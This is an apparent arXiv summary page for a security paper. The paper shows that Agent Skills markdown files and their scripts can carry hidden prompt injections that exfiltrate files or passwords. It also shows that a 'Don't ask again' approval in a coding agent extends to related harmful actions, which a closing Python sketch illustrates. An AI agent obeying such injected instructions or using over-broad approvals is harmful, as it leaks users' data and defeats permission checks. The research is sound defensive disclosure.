Agent Skills Enable a New Class of Realistic and Trivially Simple Prompt Injections

David Schmotz; Sahar Abdelnabi; Maksym Andriushchenko

arXiv:2510.26328 · cs.LG · October 31, 2025

TL;DR

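Agent Skills, a framework introduced as a step toward continual learning that gives LLM agents new knowledge through instructions stored in markdown files, is vulnerable to trivially simple prompt injections: malicious instructions hidden in long skill files or referenced scripts can exfiltrate sensitive data and bypass system-level guardrails.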

Contribution

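The paper demonstrates that simple prompt injections hidden in Agent Skill files and their referenced scripts can exfiltrate data such as internal files or passwords, and that a benign approval given with the "Don't ask again" option in a popular coding agent can carry over to closely related but harmful actions.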

Findings

01. Agent Skills enable trivial prompt injections

02. Malicious instructions can exfiltrate sensitive data

03. System guardrails can be bypassed easily

Abstract

Enabling continual learning in LLMs remains a key unresolved research challenge. In a recent announcement, a frontier LLM company made a step towards this by introducing Agent Skills, a framework that equips agents with new knowledge based on instructions stored in simple markdown files. Although Agent Skills can be a very useful tool, we show that they are fundamentally insecure, since they enable trivially simple prompt injections. We demonstrate how to hide malicious instructions in long Agent Skill files and referenced scripts to exfiltrate sensitive data, such as internal files or passwords. Importantly, we show how to bypass system-level guardrails of a popular coding agent: a benign, task-specific approval with the "Don't ask again" option can carry over to closely related but harmful actions. Overall, we conclude that despite ongoing research efforts and scaling model…
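The guardrail bypass described in the abstract can be illustrated with a minimal sketch. The abstract does not say how the coding agent matches a stored "Don't ask again" approval against later commands, so the matching rule here is an assumption: a coarse cache that remembers only the program name, compared with a strict cache that remembers the full command. The class `ApprovalCache`, the script names, and the URL are all hypothetical and are not taken from the paper or from any real agent.

```python
import shlex


class ApprovalCache:
    """Hypothetical "Don't ask again" store; not any real agent's implementation."""

    def __init__(self, coarse: bool):
        # coarse=True: remember only the program name (assumed, overly broad rule).
        # coarse=False: remember the exact argument vector.
        self.coarse = coarse
        self._approved = set()

    def _key(self, command: str) -> tuple:
        argv = shlex.split(command)
        return tuple(argv[:1]) if self.coarse else tuple(argv)

    def approve(self, command: str) -> None:
        """Record that the user approved this command with "Don't ask again"."""
        self._approved.add(self._key(command))

    def is_preapproved(self, command: str) -> bool:
        """Return True if the command would run without a new prompt."""
        return self._key(command) in self._approved


# Hypothetical commands: a benign skill script and a closely related harmful one.
benign = "python scripts/format_report.py report.md"
harmful = "python scripts/backup.py --upload https://example.invalid/collect"

coarse = ApprovalCache(coarse=True)
coarse.approve(benign)

strict = ApprovalCache(coarse=False)
strict.approve(benign)

# Under the coarse rule the benign approval also covers the harmful command.
coarse_carries_over = coarse.is_preapproved(harmful)
# Under the strict rule the harmful command would trigger a fresh prompt.
strict_carries_over = strict.is_preapproved(harmful)
```

Under these assumptions, the coarse cache lets the harmful command through on the strength of the earlier benign approval, while the strict cache does not. Exact-match approvals cost more prompts, which is the usability trade-off that makes broad approvals tempting in the first place.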
